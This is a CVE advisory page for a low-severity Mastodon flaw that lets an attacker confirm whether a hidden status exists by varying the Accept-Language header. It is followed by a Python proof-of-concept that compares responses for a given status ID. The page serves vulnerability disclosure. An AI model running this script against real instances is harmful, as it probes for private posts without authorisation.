Security Vulnerability Report
CVE-2025-67500 CVSS 3.7 LOW

CVE-2025-67500

Published: 2025-12-10 00:16:11
Last Modified: 2025-12-19 19:29:53

Description

Mastodon is a free, open-source social network server based on ActivityPub. Versions 4.2.27 and prior, 4.3.0-beta.1 through 4.3.14, 4.4.0-beta.1 through 4.4.9, 4.5.0-beta.1 through 4.5.2 have discrepancies in error handling which allow checking whether a given status exists by sending a request with a non-English Accept-Language header. Using this behavior, an attacker who knows the identifier of a particular status they are not allowed to see can confirm whether this status exists or not. This cannot be used to learn the contents of the status or any other property besides its existence. This issue is fixed in versions 4.2.28, 4.3.15, 4.4.10 and 4.5.3.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - Mastodon < 4.2.28 - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - Mastodon 4.3.0-beta.1 to 4.3.14 - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - Mastodon 4.4.0-beta.1 to 4.4.9 - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - Mastodon 4.5.0-beta.1 to 4.5.2 - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-67500 PoC - Mastodon Status Existence Enumeration
# This vulnerability allows attackers to check if a status exists
# by sending requests with non-English Accept-Language headers

TARGET_URL = "https://mastodon.example.com/api/v1/statuses/"
STATUS_ID = "123456789"  # Replace with target status ID


def check_status_exists(status_id):
    """
    Check if a status exists by comparing responses with different
    Accept-Language headers
    """
    headers_english = {
        "Accept-Language": "en-US,en;q=0.9",
        "User-Agent": "Mozilla/5.0",
    }
    headers_non_english = {
        "Accept-Language": "fr-FR,fr;q=0.9",
        "User-Agent": "Mozilla/5.0",
    }

    try:
        # Send request with English Accept-Language
        resp_en = requests.get(
            f"{TARGET_URL}{status_id}",
            headers=headers_english,
            timeout=10,
        )

        # Send request with non-English Accept-Language
        resp_non_en = requests.get(
            f"{TARGET_URL}{status_id}",
            headers=headers_non_english,
            timeout=10,
        )

        # Compare responses
        if resp_en.status_code != resp_non_en.status_code:
            print(
                f"[+] Status {status_id} EXISTS (Response differs: "
                f"EN={resp_en.status_code}, NON-EN={resp_non_en.status_code})"
            )
            return True
        elif resp_en.status_code == 404 and resp_non_en.status_code == 404:
            print(f"[-] Status {status_id} does NOT exist")
            return False
        else:
            print(
                f"[?] Status {status_id} - Unable to determine "
                f"(both returned {resp_en.status_code})"
            )
            return None

    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-67500 PoC - Mastodon Status Enumeration")
    print("=" * 50)
    check_status_exists(STATUS_ID)

References

Patch: https://github.com/mastodon/mastodon/pull/37077/commits/9957d3218cb33fea6a44bb285e2ba4795a059e4f
Vendor Advisory: https://github.com/mastodon/mastodon/security/advisories/GHSA-gwhw-gcjx-72v8
Weakness: CWE-204 (Observable Response Discrepancy)